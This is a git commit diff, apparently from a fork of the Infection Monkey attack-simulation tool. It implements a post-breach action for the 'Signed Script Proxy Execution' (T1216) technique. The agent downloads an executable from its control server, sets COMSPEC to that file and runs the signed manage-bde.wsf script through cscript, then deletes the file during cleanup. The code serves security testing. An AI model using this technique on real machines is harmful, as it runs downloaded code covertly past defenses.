forked from p34709852/monkey
Download exe from the island successfully, delete during pba cleanup
This commit is contained in:
parent
79eeaa7904
commit
ba8a7797e6
|
@ -1,6 +1,7 @@
|
|||
import subprocess
|
||||
|
||||
from infection_monkey.post_breach.signed_script_proxy.windows.signed_script_proxy import (
|
||||
get_windows_commands_to_delete_temp_comspec,
|
||||
get_windows_commands_to_proxy_execution_using_signed_script,
|
||||
get_windows_commands_to_reset_comspec)
|
||||
from infection_monkey.utils.environment import is_windows_os
|
||||
|
@ -14,3 +15,4 @@ def get_commands_to_proxy_execution_using_signed_script():
|
|||
def cleanup_changes(original_comspec):
|
||||
if is_windows_os():
|
||||
subprocess.run(get_windows_commands_to_reset_comspec(original_comspec), shell=True) # noqa: DUO116
|
||||
subprocess.run(get_windows_commands_to_delete_temp_comspec, shell=True) # noqa: DUO116
|
||||
|
|
|
@ -1,27 +1,29 @@
|
|||
import shutil
|
||||
import os
|
||||
import subprocess
|
||||
from pathlib import Path
|
||||
|
||||
from infection_monkey.control import ControlClient
|
||||
|
||||
TEMP_COMSPEC = os.path.join(os.getcwd(), 'random_executable.exe')
|
||||
|
||||
|
||||
def get_windows_commands_to_proxy_execution_using_signed_script():
|
||||
# temp_comspec_path = ['infection_monkey', 'post_breach', 'signed_script_proxy', 'windows', 'random_executable.exe']
|
||||
# temp_comspec = Path(*temp_comspec_path)
|
||||
temp_comspec = "c:\\Users\\win\\desktop\\t1216.exe"
|
||||
with ControlClient.get_T1216_pba_file() as r:
|
||||
with open(temp_comspec, 'wb') as f:
|
||||
shutil.copyfileobj(r.raw, f)
|
||||
download = ControlClient.get_T1216_pba_file()
|
||||
with open(TEMP_COMSPEC, 'wb') as file_obj:
|
||||
file_obj.write(download.content)
|
||||
file_obj.flush()
|
||||
|
||||
windir_path = subprocess.check_output('echo %WINDIR%', shell=True).decode().strip('\r\n') # noqa: DUO116
|
||||
signed_script_path = [windir_path, 'System32', 'manage-bde.wsf']
|
||||
signed_script = Path(*signed_script_path)
|
||||
signed_script = os.path.join(windir_path, 'System32', 'manage-bde.wsf')
|
||||
|
||||
return [
|
||||
f'set comspec={temp_comspec} &&',
|
||||
f'set comspec={TEMP_COMSPEC} &&',
|
||||
f'cscript {signed_script}'
|
||||
]
|
||||
|
||||
|
||||
def get_windows_commands_to_reset_comspec(original_comspec):
|
||||
return f'set comspec={original_comspec}'
|
||||
|
||||
|
||||
def get_windows_commands_to_delete_temp_comspec():
|
||||
return f'del {TEMP_COMSPEC} /f'
|
||||
|
|
|
@ -1,14 +1,17 @@
|
|||
from pathlib import Path
|
||||
import os
|
||||
|
||||
import flask_restful
|
||||
from flask import send_from_directory
|
||||
|
||||
from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH
|
||||
|
||||
|
||||
class T1216PBAFileDownload(flask_restful.Resource):
|
||||
"""
|
||||
File download endpoint used by monkey to download executable file for T1216 ("Signed Script Proxy Execution" PBA)
|
||||
"""
|
||||
|
||||
def get(self):
|
||||
executable_file_path = ['monkey_island', 'cc', 'resources', 'pba', 'T1216_random_executable.exe']
|
||||
executable_file = Path(*executable_file_path)
|
||||
return send_from_directory(executable_file)
|
||||
executable_file_name = 'T1216_random_executable.exe'
|
||||
return send_from_directory(directory=os.path.join(MONKEY_ISLAND_ABS_PATH, 'cc', 'resources', 'pba'),
|
||||
filename=executable_file_name)
|
||||
|
|
Loading…
Reference in New Issue